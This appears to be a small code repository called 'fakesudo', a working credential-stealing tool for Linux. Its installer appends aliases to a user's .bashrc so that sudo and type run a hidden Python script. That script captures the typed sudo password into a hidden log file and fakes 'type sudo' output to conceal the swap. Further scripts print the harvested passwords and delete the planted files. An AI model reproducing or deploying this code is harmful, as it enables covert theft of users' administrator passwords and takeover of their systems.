├── README.md ├── TODO ├── fake.py ├── install.py ├── removeMe.py ├── showPasses.py └── sud.sh /README.md: -------------------------------------------------------------------------------- 1 | # fakesudo - sudo almost as fake as your ma 2 | 3 | This is a very simple and primitive keylogger: it appends an alias of ``sudo`` (and a wrapper for ``type``, so that ``type sudo`` still reports ``/usr/bin/sudo``) to ``.bashrc``, and the aliased script records the password typed at its prompt rather than any other keystrokes. 4 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | 1) Repair time check! 2 | 2) gksu 3 | 4 | -------------------------------------------------------------------------------- /fake.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | from getpass import * 4 | import time 5 | import os 6 | import sys 7 | 8 | 9 | catchFile = "--catched--" 10 | 11 | def fakeSudo(): 12 | def savePass(passwd): 13 | try: 14 | file = open(catchFile, 'a') 15 | except: 16 | file = open(catchFile, 'w') 17 | 18 | catch = "%s|%s|%s\n" % (getuser(), passwd, str(time.ctime())) 19 | file.write(catch) 20 | file.close() 21 | 22 | # Catch pass: 23 | try: 24 | passwd = getpass("[fakesudo] password for %s: " % getuser()) 25 | except KeyboardInterrupt: 26 | passwd = getpass("Password: ") 27 | 28 | # Save pass: 29 | savePass(passwd) 30 | 31 | # Do the command: 32 | # change this to some python pipeline or what! 
33 | sudocmd = 'echo "%s" | sudo -s %s' % (passwd, " ".join(sys.argv[2:])) 34 | 35 | os.system(sudocmd) 36 | 37 | 38 | def fakeType(): 39 | def typeType(): 40 | print "type is a shell builtin" 41 | 42 | def typeSudo(): 43 | print "sudo is /usr/bin/sudo" 44 | 45 | try: 46 | args = sys.argv[2:] 47 | if args: 48 | for arg in args: 49 | if arg == "type": 50 | typeType() 51 | elif arg == "sudo": 52 | typeSudo() 53 | else: 54 | os.system("type %s" % arg) 55 | except: 56 | pass 57 | 58 | 59 | try: 60 | mode = sys.argv[1] 61 | except: 62 | print "You must specify what to do!" 63 | exit() 64 | 65 | 66 | if mode == "sudo": 67 | fakeSudo() 68 | 69 | if mode == "type": 70 | fakeType() 71 | 72 | 73 | -------------------------------------------------------------------------------- /install.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | import os 4 | from random import choice 5 | from string import letters 6 | 7 | 8 | 9 | 10 | def generateRandomText(lng, begining = ""): 11 | text = begining 12 | 13 | for x in range(lng): 14 | text += choice(letters) 15 | return text 16 | 17 | 18 | 19 | home = os.getenv("HOME") 20 | 21 | fakeSudoFilename = generateRandomText(6, ".") # filename for fakesudo.py 22 | 23 | sudoLoc = home + "/" + fakeSudoFilename # location for previous 24 | 25 | fakeLogFilename = generateRandomText(6, ".") # filename for logfile - file with passwords 26 | logLoc = home + "/" + fakeLogFilename 27 | 28 | 29 | 30 | 31 | ### inject alias code into bashrc from sud.sh 32 | with open("sud.sh", "r") as file: 33 | data = file.read() 34 | 35 | rdata = data.replace("--fake--", sudoLoc) 36 | 37 | with open( home + "/.bashrc", "a") as file: 38 | file.write(rdata) 39 | 40 | 41 | 42 | ### Copy fakesudo.py to home dir: 43 | 44 | 45 | with open("fake.py", "r") as file: 46 | data = file.read() 47 | 48 | rdata = data.replace("--catched--", logLoc) 49 | 50 | with open(sudoLoc, "w") as file: 51 | 
file.write(rdata) 52 | 53 | 54 | 55 | 56 | with open("logNames", "a") as ffile: 57 | logLine = "%s|%s|%s" % (fakeSudoFilename, fakeLogFilename, home) 58 | ffile.write(logLine + "\n") 59 | 60 | 61 | print("Script was written to %s password will be stored at %s" % (fakeSudoFilename, fakeLogFilename)) 62 | 63 | 64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /removeMe.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | 4 | import os 5 | 6 | def deleteFile(path): 7 | print "Trying to delete file: ", path, 8 | try: 9 | os.remove(path) 10 | print " ok!" 11 | except: 12 | print "Fail!" 13 | 14 | 15 | with open("logNames", "r") as file: 16 | raw = file.read() 17 | 18 | for line in raw.splitlines(): 19 | lineParsed = line.split("|") 20 | home = lineParsed[2] + "/" 21 | sudoLoc = home + lineParsed[0] # location of fakesudo 22 | logLoc = home + lineParsed[1] # location of logfile 23 | 24 | deleteFile(sudoLoc) 25 | deleteFile(logLoc) 26 | 27 | print "Please, clean your bashrc at your own." 28 | -------------------------------------------------------------------------------- /showPasses.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | import time 4 | 5 | with open("logNames", "r") as file: 6 | raw = file.read() 7 | 8 | for line in raw.splitlines(): 9 | lineParsed = line.split("|") 10 | home = lineParsed[2] + "/" 11 | sudoLoc = home + lineParsed[0] # location of fakesudo 12 | logLoc = home + lineParsed[1] # location of logfile 13 | try: 14 | with open(logLoc, "r") as file: 15 | data = file.read() 16 | for passwd in data.splitlines(): 17 | info = passwd.split("|") 18 | opened = time.ctime(float(info[2])) 19 | print "User: %s, pass:'%s', at: %s" % (info[0], info[1], opened) 20 | except: 21 | pass 22 | -------------------------------------------------------------------------------- /sud.sh: -------------------------------------------------------------------------------- 1 | Type () { 2 | python --fake-- type $*; 3 | } 4 | 5 | alias type="Type" 6 | 7 | alias sudo="python --fake-- sudo " 8 | --------------------------------------------------------------------------------